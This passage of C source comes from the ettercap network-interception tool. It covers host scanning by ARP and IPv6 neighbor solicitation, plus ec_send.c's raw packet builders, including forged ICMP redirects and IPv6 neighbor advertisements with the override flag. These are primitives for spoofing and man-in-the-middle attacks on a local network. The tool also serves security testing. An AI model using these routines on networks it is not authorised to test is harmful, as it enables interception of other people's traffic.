memcpy(&e->ip, &i->ip, sizeof(struct ip_addr)); nhosts++; /* add to the list randomly */ random_list(e, nhosts); } } #endif DEBUG_MSG("scan_targets: %d hosts to be scanned", nhosts); /* don't scan if there are no hosts */ if (nhosts == 0) return; snprintf(title, sizeof(title)-1, "Scanning for merged targets (%d hosts)...", nhosts); INSTANT_USER_MSG("%s\n\n", title); /* and now scan the LAN */ LIST_FOREACH(e, &ip_list_head, next) { /* send the arp request */ switch(ntohs(e->ip.addr_type)) { case AF_INET: send_arp(ARPOP_REQUEST, &EC_GBL_IFACE->ip, EC_GBL_IFACE->mac, &e->ip, MEDIA_BROADCAST); break; #ifdef WITH_IPV6 case AF_INET6: if (ip_addr_is_local(&e->ip, &ip) == E_SUCCESS) { ip_addr_init_sol(&sn, &e->ip, tmac); send_L2_icmp6_nsol(&ip, &sn, &e->ip, EC_GBL_IFACE->mac, tmac); } break; #endif } /* update the progress bar */ ret = ui_progress(title, n++, nhosts); /* user has requested to stop the task */ if (ret == UI_PROGRESS_INTERRUPTED) { INSTANT_USER_MSG("Scan interrupted by user. Partial results may have been recorded...\n"); /* stop the capture thread if sniffing is not active */ if (!EC_GBL_SNIFF->active) capture_stop(EC_GBL_IFACE); hook_del(HOOK_PACKET_ARP, &get_response); #ifdef WITH_IPV6 hook_del(HOOK_PACKET_ICMP6_NADV, &get_response); hook_del(HOOK_PACKET_ICMP6_RPLY, &get_response); hook_del(HOOK_PACKET_ICMP6_PARM, &get_response); #endif /* delete the temporary list */ LIST_FOREACH_SAFE(e, &ip_list_head, next, tmp) { LIST_REMOVE(e, next); SAFE_FREE(e); } SCAN_UNLOCK; /* cancel the scan thread */ ec_thread_exit(); } /* wait for a delay */ ec_usleep(MILLI2MICRO(EC_GBL_CONF->arp_storm_delay)); } /* delete the temporary list */ LIST_FOREACH_SAFE(e, &ip_list_head, next, tmp) { LIST_REMOVE(e, next); SAFE_FREE(e); } } /* * load the hosts list from this file */ int scan_load_hosts(char *filename) { FILE *hf; int nhosts; char ip[MAX_ASCII_ADDR_LEN]; char mac[ETH_ASCII_ADDR_LEN]; char name[MAX_HOSTNAME_LEN]; struct ip_addr hip; u_int8 hmac[MEDIA_ADDR_LEN]; DEBUG_MSG("scan_load_hosts: %s", filename); /* open the file */ hf = fopen(filename, FOPEN_READ_TEXT); if (hf == NULL) SEMIFATAL_ERROR("Cannot open %s", filename); INSTANT_USER_MSG("Loading hosts list from file %s\n", filename); /* read the file */ for (nhosts = 0; !feof(hf); nhosts++) { if (fscanf(hf, "%"EC_TOSTRING(MAX_ASCII_ADDR_LEN)"s %"EC_TOSTRING(ETH_ASCII_ADDR_LEN)"s %"EC_TOSTRING(MAX_HOSTNAME_LEN)"s\n", ip, mac, name) != 3 || *ip == '#' || *mac == '#' || *name == '#') continue; /* convert to network */ if (!mac_addr_aton(mac, hmac)) { USER_MSG("Bad MAC address while parsing line %d", nhosts + 1); continue; } if (ip_addr_pton(ip, &hip) != E_SUCCESS) { /* neither IPv4 nor IPv6 - inform user and skip line*/ USER_MSG("Bad IP address while parsing line %d", nhosts + 1); continue; //del_hosts_list(); //SEMIFATAL_ERROR("Bad parsing on line %d", nhosts + 1); } /* wipe the null hostname */ if (!strcmp(name, "-")) name[0] = '\0'; /* add to the list */ add_host(&hip, hmac, name); } fclose(hf); DEBUG_MSG("scan_load_hosts: loaded %d hosts lines", nhosts); return E_SUCCESS; } /* * save the host list to this file */ int scan_save_hosts(char *filename) { FILE *hf; int nhosts = 0; struct hosts_list *hl; char tmp[MAX_ASCII_ADDR_LEN]; DEBUG_MSG("scan_save_hosts: %s", filename); /* open the file */ hf = fopen(filename, FOPEN_WRITE_TEXT); if (hf == NULL) SEMIFATAL_ERROR("Cannot open %s for writing", filename); /* save the list */ LIST_FOREACH(hl, &EC_GBL_HOSTLIST, next) { fprintf(hf, "%s ", ip_addr_ntoa(&hl->ip, tmp)); fprintf(hf, "%s ", mac_addr_ntoa(hl->mac, tmp)); if (hl->hostname && *hl->hostname != '\0') fprintf(hf, "%s\n", hl->hostname); else fprintf(hf, "-\n"); nhosts++; } /* close the file */ fclose(hf); INSTANT_USER_MSG("%d hosts saved to file %s\n", nhosts, filename); return E_SUCCESS; } /* * add an host to the list * order the list while inserting the elements */ void add_host(struct ip_addr *ip, u_int8 mac[MEDIA_ADDR_LEN], char *name) { struct hosts_list *hl, *h; /* don't add to hostlist if the found IP is ours */ if (ip_addr_is_ours(ip) == E_FOUND) return; /* don't add undefined address */ if (ip_addr_is_zero(ip)) return; SAFE_CALLOC(h, 1, sizeof(struct hosts_list)); /* fill the struct */ memcpy(&h->ip, ip, sizeof(struct ip_addr)); memcpy(&h->mac, mac, MEDIA_ADDR_LEN); if (name) h->hostname = strdup(name); /* insert in order (ascending) */ LIST_FOREACH(hl, &EC_GBL_HOSTLIST, next) { if (ip_addr_cmp(&h->ip, &hl->ip) == 0) { /* the ip was already collected skip it */ SAFE_FREE(h->hostname); SAFE_FREE(h); return; } else if (ip_addr_cmp(&hl->ip, &h->ip) < 0 && LIST_NEXT(hl, next) != LIST_END(&EC_GBL_HOSTLIST) ) continue; else if (ip_addr_cmp(&h->ip, &hl->ip) > 0) { LIST_INSERT_AFTER(hl, h, next); break; } else { LIST_INSERT_BEFORE(hl, h, next); break; } } /* the first element */ if (LIST_FIRST(&EC_GBL_HOSTLIST) == LIST_END(&EC_GBL_HOSTLIST)) LIST_INSERT_HEAD(&EC_GBL_HOSTLIST, h, next); } /* * insert the element in the list randomly. * 'max' is the number of elements in the list */ static void random_list(struct ip_list *e, int max) { int rnd; srand(time(NULL)); /* calculate the position in the list. */ rnd = rand() % ((max == 1) ? max : max - 1); //rnd = 1+(int) ((float)max*rand()/(RAND_MAX+1.0)); /* allocate the array used to keep track of the pointer * to the elements in the list. this array speed up the * access method to the list */ SAFE_REALLOC(rand_array, (max + 1) * sizeof(struct ip_addr *)); /* the first element */ if (LIST_FIRST(&ip_list_head) == LIST_END(&ip_list_head)) { LIST_INSERT_HEAD(&ip_list_head, e, next); rand_array[0] = e; return; } /* bound checking */ rnd = (rnd > 1) ? rnd : 1; /* insert the element in the list */ LIST_INSERT_AFTER(rand_array[rnd - 1], e, next); /* and add the pointer in the array */ rand_array[max - 1] = e; } void __init hook_init(void) { hook_add(HOOK_PACKET_IP, &hosts_list_hook); hook_add(HOOK_PACKET_IP6, &hosts_list_hook); } /* * This function adds local nodes to the global hosts list. * Its quite slow and I don't have any better ideas at the moment. */ static void hosts_list_hook(struct packet_object *po) { switch(ip_addr_is_ours(&po->L3.src)) { case E_FOUND: case E_BRIDGE: return; } if(ip_addr_is_local(&po->L3.src, NULL) == E_SUCCESS) { add_host(&po->L3.src, po->L2.src, NULL); } return; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_send.c000664 000000 000000 00000160476 13711276346 016033 0ustar00rootroot000000 000000 /* ettercap -- send the the wire functions Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #if defined(OS_DARWIN) || defined(OS_BSD) #include #endif #include #include #include #include #include #include #define PCAP_TIMEOUT 10 /* globals */ u_int8 MEDIA_BROADCAST[MEDIA_ADDR_LEN] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff}; u_int8 ARP_BROADCAST[MEDIA_ADDR_LEN] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00}; static SLIST_HEAD (, build_entry) builders_table; struct build_entry { u_int8 dlt; FUNC_BUILDER_PTR(builder); SLIST_ENTRY (build_entry) next; }; /* protos */ libnet_ptag_t ec_build_link_layer(u_int8 dlt, u_int8 *dst, u_int16 proto, libnet_t* l); static pthread_mutex_t send_mutex = PTHREAD_MUTEX_INITIALIZER; #define SEND_LOCK do{ pthread_mutex_lock(&send_mutex); } while(0) #define SEND_UNLOCK do{ pthread_mutex_unlock(&send_mutex); } while(0) /*******************************************/ /* * send the packet at layer 3 * the eth header will be handled by the kernel */ int send_to_L3(struct packet_object *po) { libnet_ptag_t t; libnet_t *l; char tmp[MAX_ASCII_ADDR_LEN]; int c; switch(ntohs(po->L3.src.addr_type)) { case AF_INET: l = EC_GBL_LNET->lnet_IP4; break; #ifdef WITH_IPV6 case AF_INET6: l = EC_GBL_LNET->lnet_IP6; break; #endif default: l = NULL; break; } /* Do not send the packet if corresponding * libnet handler is not initialized */ if(l == NULL) return -E_NOTHANDLED; SEND_LOCK; t = libnet_build_data(po->fwd_packet, po->fwd_len, l, 0); ON_ERROR(t, -1, "libnet_build_data: %s", libnet_geterror(l)); c = libnet_write(l); //ON_ERROR(c, -1, "libnet_write %d (%d): %s", po->fwd_len, c, libnet_geterror(l)); if (c == -1) USER_MSG("SEND L3 ERROR: %d byte packet (%04x:%02x) destined to %s was not forwarded (%s)\n", po->fwd_len, ntohs(po->L3.proto), po->L4.proto, ip_addr_ntoa(&po->L3.dst, tmp), libnet_geterror(l)); /* clear the pblock */ libnet_clear_packet(l); SEND_UNLOCK; return c; } /* * send the packet at layer 2 * this can be used to send ARP messages */ int send_to_L2(struct packet_object *po) { return send_to_iface(po, EC_GBL_IFACE); } /* * send the packet to the bridge */ int send_to_bridge(struct packet_object *po) { return send_to_iface(po, EC_GBL_BRIDGE); } int send_to_iface(struct packet_object *po, struct iface_env *iface) { libnet_ptag_t t; int c; libnet_t *l; if(iface->unoffensive) return -E_INVALID; /* if not lnet warn the developer ;) */ BUG_IF(iface->lnet == NULL); l = iface->lnet; SEND_LOCK; t = libnet_build_data(po->packet, po->len, l, 0); ON_ERROR(t, -1, "libnet_build_data: %s", libnet_geterror(l)); c = libnet_write(l); ON_ERROR(c, -1, "libnet_write %d (%d): %s", po->len, c, libnet_geterror(l)); /* clear the pblock */ libnet_clear_packet(l); SEND_UNLOCK; return c; } /* * we MUST not sniff packets sent by us at link layer. * expecially useful in bridged sniffing. * * so we have to find a solution... */ void capture_only_incoming(pcap_t *p, libnet_t *l) { (void)p; (void)l; #ifdef OS_LINUX /* * a dirty hack to use the same socket for pcap and libnet. * both the structures contains a "int fd" field representing the socket. * we can close the fd opened by libnet and use the one already in use by pcap. */ DEBUG_MSG("hack_pcap_lnet (before) pcap %d | lnet %d", pcap_fileno(p), l->fd); /* needed to avoid double execution (for portstealing) */ if (pcap_fileno(p) == l->fd) return; /* close the lnet socket */ close(libnet_getfd(l)); /* use the socket opened by pcap */ l->fd = pcap_fileno(p); DEBUG_MSG("hack_pcap_lnet (after) pcap %d | lnet %d", pcap_fileno(p), l->fd); #endif #ifdef OS_BSD /* * under BSD we cannot hack the fd as in linux... * pcap opens the /dev/bpf in O_RDONLY and lnet needs O_RDWR * * so (if supported: only FreeBSD) we can set the BIOCSSEESENT to 0 to * see only incoming packets * but this is unconfortable, because we will not able to sniff ourself. */ #ifdef OS_BSD_FREE int val = 0; DEBUG_MSG("hack_pcap_lnet: setting BIOCSSEESENT on pcap handler"); /* set it to 0 to capture only incoming traffic */ ioctl(pcap_fileno(p), BIOCSSEESENT, &val); #else DEBUG_MSG("hack_pcap_lnet: not applicable on this OS"); #endif #endif #ifdef OS_DARWIN int val = 0; DEBUG_MSG("hack_pcap_lnet: setting BIOCSSEESENT on pcap handler"); /* not all darwin versions support BIOCSSEESENT */ #ifdef BIOCSSEESENT ioctl(pcap_fileno(p), BIOCSSEESENT, &val); #endif #endif #ifdef OS_SOLARIS DEBUG_MSG("hack_pcap_lnet: not applicable on this OS"); #endif #ifdef OS_CYGWIN DEBUG_MSG("hack_pcap_lnet: not applicable on this OS"); #endif } /* * register a builder in the table * a builder is a function to create a link layer header. */ void add_builder(u_int8 dlt, FUNC_BUILDER_PTR(builder)) { struct build_entry *e; SAFE_CALLOC(e, 1, sizeof(struct build_entry)); e->dlt = dlt; e->builder = builder; SLIST_INSERT_HEAD(&builders_table, e, next); return; } /* * build the header calling the registered * function for the current media */ libnet_ptag_t ec_build_link_layer(u_int8 dlt, u_int8 *dst, u_int16 proto, libnet_t* l) { struct build_entry *e; SLIST_FOREACH (e, &builders_table, next) { if (e->dlt == dlt) { return e->builder(dst, proto, l); } } /* on error return -1 */ return -1; } /* * helper function to send out an ARP packet */ int send_arp(u_char type, struct ip_addr *sip, u_int8 *smac, struct ip_addr *tip, u_int8 *tmac) { libnet_ptag_t t; libnet_t *l; int c; /* if not lnet warn the developer ;) */ BUG_IF(EC_GBL_IFACE->lnet == NULL); l = EC_GBL_IFACE->lnet; SEND_LOCK; /* ARP uses 00:00:00:00:00:00 broadcast */ if (type == ARPOP_REQUEST && tmac == MEDIA_BROADCAST) tmac = ARP_BROADCAST; /* create the ARP header */ t = libnet_build_arp( ARPHRD_ETHER, /* hardware addr */ ETHERTYPE_IP, /* protocol addr */ MEDIA_ADDR_LEN, /* hardware addr size */ IP_ADDR_LEN, /* protocol addr size */ type, /* operation type */ smac, /* sender hardware addr */ (u_char *)&(sip->addr), /* sender protocol addr */ tmac, /* target hardware addr */ (u_char *)&(tip->addr), /* target protocol addr */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); /* pblock id */ ON_ERROR(t, -1, "libnet_build_arp: %s", libnet_geterror(l)); /* MEDIA uses ff:ff:ff:ff:ff:ff broadcast */ if (type == ARPOP_REQUEST && tmac == ARP_BROADCAST) tmac = MEDIA_BROADCAST; /* add the media header */ t = ec_build_link_layer(EC_GBL_PCAP->dlt, tmac, ETHERTYPE_ARP, l); if (t == -1) FATAL_ERROR("Interface not suitable for layer2 sending"); /* send the packet */ c = libnet_write(l); ON_ERROR(c, -1, "libnet_write (%d): %s", c, libnet_geterror(l)); /* clear the pblock */ libnet_clear_packet(l); SEND_UNLOCK; return c; } /* * helper function to send out an ICMP PORT UNREACH packet at layer 3 */ int send_L3_icmp_unreach(struct packet_object *po) { libnet_ptag_t t; int c; libnet_t *l; /* if not lnet warn the developer ;) */ BUG_IF(EC_GBL_LNET->lnet_IP4 == 0); l = EC_GBL_LNET->lnet_IP4; SEND_LOCK; /* create the ICMP header */ t = libnet_build_icmpv4_echo( 3, /* type */ 3, /* code */ 0, /* checksum */ htons(EC_MAGIC_16), /* identification number */ htons(EC_MAGIC_16), /* sequence number */ po->L3.header, /* payload */ po->L3.len + 8, /* payload size */ l, /* libnet handle */ 0); /* pblock id */ ON_ERROR(t, -1, "libnet_build_icmpv4_echo: %s", libnet_geterror(l)); /* auto calculate the checksum */ libnet_toggle_checksum(l, t, LIBNET_ON); /* create the IP header */ t = libnet_build_ipv4( LIBNET_IPV4_H + LIBNET_ICMPV4_ECHO_H, /* length */ 0, /* TOS */ htons(EC_MAGIC_16), /* IP ID */ 0, /* IP Frag */ 64, /* TTL */ IPPROTO_ICMP, /* protocol */ 0, /* checksum */ *po->L3.dst.addr32, /* source IP */ *po->L3.src.addr32, /* destination IP */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); ON_ERROR(t, -1, "libnet_build_ipv4: %s", libnet_geterror(l)); /* auto calculate the checksum */ libnet_toggle_checksum(l, t, LIBNET_ON); /* send the packet to Layer 3 */ c = libnet_write(l); ON_ERROR(c, -1, "libnet_write (%d): %s", c, libnet_geterror(l)); /* clear the pblock */ libnet_clear_packet(l); SEND_UNLOCK; return c; } /* * helper function to send out an ICMP ECHO packet at layer 3 */ int send_L3_icmp(u_char type, struct ip_addr *sip, struct ip_addr *tip) { libnet_ptag_t t; int c; libnet_t *l; /* if not lnet warn the developer ;) */ BUG_IF(EC_GBL_LNET->lnet_IP4 == 0); l = EC_GBL_LNET->lnet_IP4; SEND_LOCK; /* create the ICMP header */ t = libnet_build_icmpv4_echo( type, /* type */ 0, /* code */ 0, /* checksum */ htons(EC_MAGIC_16), /* identification number */ htons(EC_MAGIC_16), /* sequence number */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); /* pblock id */ ON_ERROR(t, -1, "libnet_build_icmpv4_echo: %s", libnet_geterror(l)); /* auto calculate the checksum */ libnet_toggle_checksum(l, t, LIBNET_ON); /* create the IP header */ t = libnet_build_ipv4( LIBNET_IPV4_H + LIBNET_ICMPV4_ECHO_H, /* length */ 0, /* TOS */ htons(EC_MAGIC_16), /* IP ID */ 0, /* IP Frag */ 64, /* TTL */ IPPROTO_ICMP, /* protocol */ 0, /* checksum */ *sip->addr32, /* source IP */ *tip->addr32, /* destination IP */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); ON_ERROR(t, -1, "libnet_build_ipv4: %s", libnet_geterror(l)); /* auto calculate the checksum */ libnet_toggle_checksum(l, t, LIBNET_ON); /* send the packet to Layer 3 */ c = libnet_write(l); ON_ERROR(c, -1, "libnet_write (%d): %s", c, libnet_geterror(l)); /* clear the pblock */ libnet_clear_packet(l); SEND_UNLOCK; return c; } int send_L3_icmp_echo(struct ip_addr *src, struct ip_addr *tgt) { return send_L3_icmp(ICMP_ECHO, src, tgt); } /* * helper function to send out an ICMP ECHO packet at layer 2 */ int send_L2_icmp_echo(u_char type, struct ip_addr *sip, struct ip_addr *tip, u_int8 *tmac) { libnet_ptag_t t; int c; libnet_t *l; /* if not lnet warn the developer ;) */ BUG_IF(EC_GBL_IFACE->lnet == 0); l = EC_GBL_IFACE->lnet; SEND_LOCK; /* create the ICMP header */ t = libnet_build_icmpv4_echo( type, /* type */ 0, /* code */ 0, /* checksum */ htons(EC_MAGIC_16), /* identification number */ htons(EC_MAGIC_16), /* sequence number */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); /* pblock id */ ON_ERROR(t, -1, "libnet_build_icmpv4_echo: %s", libnet_geterror(l)); /* auto calculate the checksum */ libnet_toggle_checksum(l, t, LIBNET_ON); /* create the IP header */ t = libnet_build_ipv4( LIBNET_IPV4_H + LIBNET_ICMPV4_ECHO_H, /* length */ 0, /* TOS */ htons(EC_MAGIC_16), /* IP ID */ 0, /* IP Frag */ 64, /* TTL */ IPPROTO_ICMP, /* protocol */ 0, /* checksum */ *sip->addr32, /* source IP */ *tip->addr32, /* destination IP */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); ON_ERROR(t, -1, "libnet_build_ipv4: %s", libnet_geterror(l)); /* auto calculate the checksum */ libnet_toggle_checksum(l, t, LIBNET_ON); /* add the media header */ t = ec_build_link_layer(EC_GBL_PCAP->dlt, tmac, ETHERTYPE_IP, l); if (t == -1) FATAL_ERROR("Interface not suitable for layer2 sending"); /* send the packet to Layer 2 */ c = libnet_write(l); ON_ERROR(c, -1, "libnet_write (%d): %s", c, libnet_geterror(l)); /* clear the pblock */ libnet_clear_packet(l); SEND_UNLOCK; return c; } /* * helper function to send out an ICMP REDIRECT packet * the header are created on the source packet PO. */ int send_icmp_redir(u_char type, struct ip_addr *sip, struct ip_addr *gw, struct packet_object *po) { libnet_ptag_t t; libnet_t *l; struct libnet_ipv4_hdr *ip; int c; /* if not lnet warn the developer ;) */ BUG_IF(EC_GBL_IFACE->lnet == 0); l = EC_GBL_IFACE->lnet; /* retrieve the old ip header */ ip = (struct libnet_ipv4_hdr *)po->L3.header; SEND_LOCK; /* create the fake ip header for the icmp payload */ t = libnet_build_ipv4( LIBNET_IPV4_H + 8, //ntohs(ip->ip_len), /* original len */ ip->ip_tos, /* original tos */ ntohs(ip->ip_id), /* original id */ ntohs(ip->ip_off), /* original fragments */ ip->ip_ttl, /* original ttl */ ip->ip_p, /* original proto */ ip->ip_sum, /* original checksum */ ip->ip_src.s_addr, /* original source */ ip->ip_dst.s_addr, /* original dest */ po->L4.header, /* the 64 bit of the original datagram */ 8, /* payload size */ l, 0); ON_ERROR(t, -1, "libnet_build_ipv4: %s", libnet_geterror(l)); /* create the ICMP header */ t = libnet_build_icmpv4_redirect( ICMP_REDIRECT, /* type */ type, /* code */ 0, /* checksum */ *gw->addr32, /* gateway ip */ NULL, /* payload */ 0, /* payload len */ l, /* libnet handle */ 0); /* pblock id */ ON_ERROR(t, -1, "libnet_build_icmpv4_redirect: %s", libnet_geterror(l)); /* auto calculate the checksum */ libnet_toggle_checksum(l, t, LIBNET_ON); /* create the IP header */ t = libnet_build_ipv4( LIBNET_IPV4_H + LIBNET_ICMPV4_REDIRECT_H + LIBNET_IPV4_H + 8, /* length */ 0, /* TOS */ htons(EC_MAGIC_16), /* IP ID */ 0, /* IP Frag */ 64, /* TTL */ IPPROTO_ICMP, /* protocol */ 0, /* checksum */ *sip->addr32, /* source IP */ *po->L3.src.addr32, /* destination IP */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); ON_ERROR(t, -1, "libnet_build_ipv4: %s", libnet_geterror(l)); /* auto calculate the checksum */ libnet_toggle_checksum(l, t, LIBNET_ON); /* add the media header */ t = ec_build_link_layer(EC_GBL_PCAP->dlt, po->L2.src, ETHERTYPE_IP, l); if (t == -1) FATAL_ERROR("Interface not suitable for layer2 sending"); /* * send the packet to Layer 2 * (sending icmp redirect is not permitted at layer 3) */ c = libnet_write(l); ON_ERROR(c, -1, "libnet_write (%d): %s", c, libnet_geterror(l)); /* clear the pblock */ libnet_clear_packet(l); SEND_UNLOCK; return c; } #ifdef WITH_IPV6 int send_L3_icmp6_echo(struct ip_addr *sip, struct ip_addr *tip) { libnet_ptag_t t; struct libnet_in6_addr src, dst; int c; libnet_t *l; BUG_IF(EC_GBL_LNET->lnet_IP6 == 0); l = EC_GBL_LNET->lnet_IP6; SEND_LOCK; memcpy(&src, sip->addr, sizeof(src)); memcpy(&dst, tip->addr, sizeof(dst)); t = libnet_build_icmpv6_echo(ICMP6_ECHO_REQUEST, /* type */ 0, /* code */ 0, /* checksum */ EC_MAGIC_16, /* id */ 0, /* sequence number */ NULL, /* data */ 0, /* its size */ l, /* handle */ 0); ON_ERROR(t, -1, "libnet_build_icmpv6_echo: %s", libnet_geterror(l)); libnet_toggle_checksum(l, t, LIBNET_ON); t = libnet_build_ipv6(0, /* tc */ 0, /* flow label */ LIBNET_ICMPV6_H, /* next header size */ IPPROTO_ICMPV6, /* next header */ 255, /* hop limit */ src, /* source */ dst, /* destination */ NULL, /* payload and size */ 0, l, /* handle */ 0); /* ptag */ ON_ERROR(t, -1, "libnet_build_ipv6: %s", libnet_geterror(l)); c = libnet_write(l); ON_ERROR(c, -1, "libnet_write: %s", libnet_geterror(l)); libnet_clear_packet(l); SEND_UNLOCK; return c; } int send_L2_icmp6_echo(struct ip_addr *sip, struct ip_addr *tip, u_int8 *tmac) { libnet_ptag_t t; struct libnet_in6_addr src, dst; int c; libnet_t *l; BUG_IF(EC_GBL_IFACE->lnet == NULL); l = EC_GBL_IFACE->lnet; SEND_LOCK; memcpy(&src, sip->addr, sizeof(src)); memcpy(&dst, tip->addr, sizeof(dst)); t = libnet_build_icmpv6_echo(ICMP6_ECHO_REQUEST, /* type */ 0, /* code */ 0, /* checksum */ EC_MAGIC_16, /* id */ 0, /* sequence number */ NULL, /* data */ 0, /* its size */ l, /* handle */ 0); ON_ERROR(t, -1, "libnet_build_icmpv6_echo: %s", libnet_geterror(l)); libnet_toggle_checksum(l, t, LIBNET_ON); t = libnet_build_ipv6(0, /* tc */ 0, /* flow label */ LIBNET_ICMPV6_H, /* next header size */ IPPROTO_ICMPV6, /* next header */ 255, /* hop limit */ src, /* source */ dst, /* destination */ NULL, /* payload and size */ 0, l, /* handle */ 0); /* ptag */ ON_ERROR(t, -1, "libnet_build_ipv6: %s", libnet_geterror(l)); /* add the media header */ t = ec_build_link_layer(EC_GBL_PCAP->dlt, tmac, ETHERTYPE_IPV6, l); if (t == -1) FATAL_ERROR("Interface not suitable for layer2 sending"); c = libnet_write(l); ON_ERROR(c, -1, "libnet_write: %s", libnet_geterror(l)); libnet_clear_packet(l); SEND_UNLOCK; return c; } /* * send IP packet with an unknown header option * RFC2460 conforming hosts, respond with a ICMPv6 parameter problem * message even those not intended to respond to ICMP echos */ int send_L2_icmp6_echo_opt(struct ip_addr *sip, struct ip_addr *tip, u_int8* o_data, u_int32 o_len, u_int8 *tmac) { libnet_ptag_t t; struct libnet_in6_addr src, dst; int c, h = 0; libnet_t *l; BUG_IF(EC_GBL_IFACE->lnet == NULL); l = EC_GBL_IFACE->lnet; SEND_LOCK; memcpy(&src, sip->addr, sizeof(src)); memcpy(&dst, tip->addr, sizeof(dst)); t = libnet_build_icmpv6_echo(ICMP6_ECHO_REQUEST, /* type */ 0, /* code */ 0, /* checksum */ EC_MAGIC_16, /* id */ 0, /* sequence number */ NULL, /* data */ 0, /* its size */ l, /* handle */ 0); ON_ERROR(t, -1, "libnet_build_icmpv6_echo: %s", libnet_geterror(l)); libnet_toggle_checksum(l, t, LIBNET_ON); t = libnet_build_ipv6_destopts(IPPROTO_ICMPV6, /* next header */ LIBNET_IPV6_DESTOPTS_H / 8, /* lenth */ o_data, /* payload */ o_len, /* payload length */ l, /* handle */ 0); ON_ERROR(t, -1, "libnet_build_ipv6_destopts: %s", libnet_geterror(l)); h = LIBNET_IPV6_DESTOPTS_H + o_len + LIBNET_ICMPV6_H; t = libnet_build_ipv6(0, /* tc */ 0, /* flow label */ h, /* next header size */ IPPROTO_DSTOPTS, /* next header */ 255, /* hop limit */ src, /* source */ dst, /* destination */ NULL, /* payload and size */ 0, l, /* handle */ 0); /* ptag */ ON_ERROR(t, -1, "libnet_build_ipv6: %s", libnet_geterror(l)); /* add the media header */ t = ec_build_link_layer(EC_GBL_PCAP->dlt, tmac, ETHERTYPE_IPV6, l); if (t == -1) FATAL_ERROR("Interface not suitable for layer2 sending"); c = libnet_write(l); ON_ERROR(c, -1, "libnet_write: %s", libnet_geterror(l)); libnet_clear_packet(l); SEND_UNLOCK; return c; } /* * Sends neighbor solicitation request (like arp request with ipv4) * macaddr parameter allows to add sender's mac address. This is an option for unicast requests. * See RFC4861 for more information. */ int send_L2_icmp6_nsol(struct ip_addr *sip, struct ip_addr *tip, struct ip_addr *req, u_int8 *macaddr, u_int8 *tmac) { libnet_ptag_t t; int c, h = 0; struct libnet_in6_addr src, dst, r; libnet_t *l; BUG_IF(EC_GBL_IFACE->lnet == NULL); l = EC_GBL_IFACE->lnet; SEND_LOCK; memcpy(&src, sip->addr, sizeof(src)); memcpy(&dst, tip->addr, sizeof(dst)); memcpy(&r, req->addr, sizeof(r)); if(macaddr != NULL) { t = libnet_build_icmpv6_ndp_opt(ND_OPT_SOURCE_LINKADDR, /* Address type */ macaddr, /* MAC address */ MEDIA_ADDR_LEN, /* Address length */ l, /* libnet handle */ 0); /* ptag */ ON_ERROR(t, -1, "libnet_build_icmpv6_ndp_opt: %s", libnet_geterror(l)); /* base header size + MAC address size */ h += LIBNET_ICMPV6_NDP_OPT_H + 6; } t = libnet_build_icmpv6_ndp_nsol(ND_NEIGHBOR_SOLICIT, /* type */ 0, /* code */ 0, /* checksum */ r, /* target address */ NULL, /* payload */ 0, /* its size */ l, /* libnet handler */ 0); /* ptag */ ON_ERROR(t, -1, "libnet_build_icmpv6_ndp_nsol: %s", libnet_geterror(l)); libnet_toggle_checksum(l, t, LIBNET_ON); h += LIBNET_ICMPV6_NDP_NSOL_H; t = libnet_build_ipv6(0, /* tc */ 0, /* flow label */ h, /* length */ IPPROTO_ICMP6, /* proto */ 255, /* hop limit */ src, /* source address */ dst, /* target address */ NULL, /* payload */ 0, /* its size */ l, /* handle */ 0); /* ptag */ ON_ERROR(t, -1, "libnet_build_ipv6: %s", libnet_geterror(l)); /* add the media header */ t = ec_build_link_layer(EC_GBL_PCAP->dlt, tmac, ETHERTYPE_IPV6, l); if (t == -1) FATAL_ERROR("Interface not suitable for layer2 sending"); c = libnet_write(l); ON_ERROR(c, -1, "libnet_write: %s", libnet_geterror(l)); libnet_clear_packet(l); SEND_UNLOCK; return c; } int send_L2_icmp6_nadv(struct ip_addr *sip, struct ip_addr *tip, u_int8 *macaddr, int router, u_int8 *tmac) { libnet_ptag_t t; int c, h = 0; struct libnet_in6_addr src, dst; int flags; libnet_t *l; BUG_IF(EC_GBL_IFACE->lnet == NULL); l = EC_GBL_IFACE->lnet; SEND_LOCK; memcpy(&src, sip->addr, sizeof(src)); memcpy(&dst, tip->addr, sizeof(dst)); t = libnet_build_icmpv6_ndp_opt(ND_OPT_TARGET_LINKADDR, /* Address type */ macaddr, /* MAC address */ MEDIA_ADDR_LEN, /* Address length */ l, /* libnet handle */ 0); /* ptag */ ON_ERROR(t, -1, "libnet_build_icmpv6_ndp_lla: %s", libnet_geterror(l)); h += LIBNET_ICMPV6_NDP_OPT_H + 6; flags = ND_NA_FLAG_SOLICITED|ND_NA_FLAG_OVERRIDE; if(router) flags |= ND_NA_FLAG_ROUTER; t = libnet_build_icmpv6_ndp_nadv(ND_NEIGHBOR_ADVERT, /* type */ 0, /* code */ 0, /* checksum */ flags, /* flags */ src, /* address */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); /* ptag */ ON_ERROR(t, -1, "libnet_build_icmpv6_ndp_nadv: %s", libnet_geterror(l)); libnet_toggle_checksum(l, t, LIBNET_ON); h += LIBNET_ICMPV6_NDP_NADV_H; t = libnet_build_ipv6(0, /* tc */ 0, /* flow label */ h, /* length */ IPPROTO_ICMP6, /* proto */ 255, /* hop limit */ src, /* source address */ dst, /* target address */ NULL, /* payload */ 0, /* its size */ l, /* handle */ 0); /* ptag */ ON_ERROR(t, -1, "libnet_build_ipv6: %s", libnet_geterror(l)); /* add the media header */ t = ec_build_link_layer(EC_GBL_PCAP->dlt, tmac, 